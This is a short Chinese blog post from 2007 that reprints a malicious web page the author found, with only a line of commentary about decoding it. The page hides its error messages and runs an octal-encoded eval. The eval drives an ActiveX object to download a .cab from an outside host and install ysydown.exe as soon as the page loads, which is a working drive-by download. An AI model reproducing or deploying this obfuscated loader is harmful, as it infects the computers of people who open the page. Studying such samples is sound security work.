碰到了ysydown.exe毒霸提交竟然已经有人给提交过了

 更新时间:2007年10月18日 14:28:16   作者:  
从网站看到的一个病毒脚本,里面的代码太多了啊
不过发现了一个破解加密的好办法
复制代码 代码如下:

<SCRIPT LANGUAGE='JavaScript'> 
<!-- 
function ResumeError() { 
return true; 

window.onerror = ResumeError; 
// --> 
</SCRIPT>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title></title>
<script>
eval("\146\165\156\143\164\151\157\156\40\104\157\167\156\144\154\157\141\144\103\141\154\143\101\156\144\122\165\156\50\51\15\12\173\15\12\143\157\155\56\104\154\157\141\144\104\123\50\42\150\164\164\160\72\57\57\170\170\170\56\143\163\154\162\61\56\143\157\155\57\171\163\171\165\160\144\141\164\145\56\143\141\142\42\54\40\42\171\163\171\144\157\167\156\56\145\170\145\42\54\40\60\51\73\15\12\175");
</script>
</head>
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
</OBJECT>
<script>
DowndloadCalcAndRun()
</script>
</html>

解密方法,我也是第一次这样的测试,不用去解码八进制了

[Ctrl+A 全选 注:引入外部Js需再刷新一下页面才能执行]

相关文章

最新评论